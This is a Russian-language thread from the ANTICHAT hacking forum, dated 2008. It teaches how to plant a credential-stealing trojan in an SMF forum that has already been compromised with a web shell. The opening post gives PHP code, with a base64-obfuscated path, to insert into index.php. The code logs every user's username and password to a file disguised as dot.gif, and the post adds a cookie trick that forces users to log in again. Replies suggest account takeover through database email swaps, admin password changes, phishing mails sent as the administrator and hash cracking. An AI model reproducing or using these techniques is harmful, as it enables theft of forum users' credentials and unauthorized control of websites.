ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Трояним Smf (узнаём пассы имея шелл) |
29.04.2008, 01:44
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411
Репутация:
91
|
|
Трояним Smf (узнаём пассы имея шелл)
Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума !
Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
ПАЛЕВО !!!! скажите -)
Да нет -)
Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
Итак, есть файлик и в него будем сейвить пасы )
Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...
PHP код:
$patch_ = getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9kb3QuZ2lm');
$patch_ = str_replace("\\","/",$patch_);
if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '')
{
$f_l = fopen($patch_,'a+');
fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");
fclose($f_l);
}
этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
После него вставляем сам скрипт !
Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))
А что если юзверь авторизуется через куки и пасс вообще не вводит ?
Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
Но и на таких есть управа -)
Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
Удачи вам в вашем нелёгком, но я думаю правильном направлении !
Последний раз редактировалось n-000; 29.04.2008 в 02:20..
|
|
|
01.05.2008, 17:46
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767
Репутация:
1060
|
|
а ещё можно
через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d
а ещё можно сменить временно пас админа который не брутиться ( опять же шелл в помошь ) залезть в панель админа форума, если есть возможность увидеть пас в открытом виде узверя который так сволочь тебе нужен аж ппц то всё чисто-гладко,
если не видно - то ты как наделённый правами админа  шлёшь письмо от лица администратора письмо тому горемыки, чтоб он вражина в срочном порядке подтвердил что он не забыл свой пас и выслал его тебе на мыло в подтверждение - можно сделать массовую рассылку :d
P.s. у многих в подписе вижу: КУПЛЮ ШЕЛЛ С ВОЗМОЖНОСТЬЮ ЗАПИСИ В ИНДЕКС - что значит, другие варианты пролетают, шеллы ваши мы не купим.
А что мешает проделать тоже самое ( о чём не сложно догадаться ) на том шелле где нет прав на редактирования файла? Ничего!
Временная смена паса админу через мускуль (ну если тока речь не идёт об авторизации по Ip ) - заход в админку (правда я встречал такие админки, что как обычным юзером себя чувствуешь - минимализм ) - и меняй что те нуно.... ИМХО в 80% случаев это проканает на ура.
__________________
ICQ 9731923
|
|
|
|
04.05.2008, 14:54
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
Можно создать жабаскрипт который перепишет куки юзверю
А можно поподробнее, а то у меня с явой никак
Последний раз редактировалось ty13r; 04.05.2008 в 15:02..
|
|
|
|
04.05.2008, 18:04
|
|
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714
Репутация:
40
|
|
а че нить такое можно с Ipb Замутить?...млина неплохо было бы!
|
|
|
|
04.05.2008, 21:47
|
|
Познающий
Регистрация: 12.02.2008
Сообщений: 90
Провел на форуме:
535943
Репутация:
20
|
|
где же взять шелл для проделывания таких крутых вещей? или хотя бы где его взять для IPB 1.3 Final? |
|
|
|
05.05.2008, 15:13
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
Такая же фишка для IPB описана здесь
и тут |
|
|
|
10.05.2008, 07:27
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411
Репутация:
91
|
|
Сообщение от ty13r
Такая же фишка для IPB описана здесь
и тутТам эта фишка работает с мускулем и создаёт там левое табло, которое спалят (ИМХО) быстрей, чем неприметную картинку на серваке ...
|
|
|
|
10.05.2008, 07:33
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411
Репутация:
91
|
|
Сообщение от Rogun
где же взять шелл для проделывания таких крутых вещей? или хотя бы где его взять для IPB 1.3 Final? Ну шел можно взять например от маднета... а как залить его на IPB смотри ТУТ , версия не совпадает но можно попробывать.
|
|
|
|
10.05.2008, 08:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
Сообщение от PSalm69
а ещё можно
через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d
да ладно, это ж как он ретривнется, если в бд он в хеше хранится? точно не помню, но пасс полюбому новый присылается рандомный.
__________________
ПИУ-ПИУ...
|
|
|
|
10.05.2008, 10:07
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
а невориант посмотреть с конфиге логин и пас к мускул зайти в неё через шел и там посмотреть все пасы пользователей? но при этом открыть страницу md5.xek.cc
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
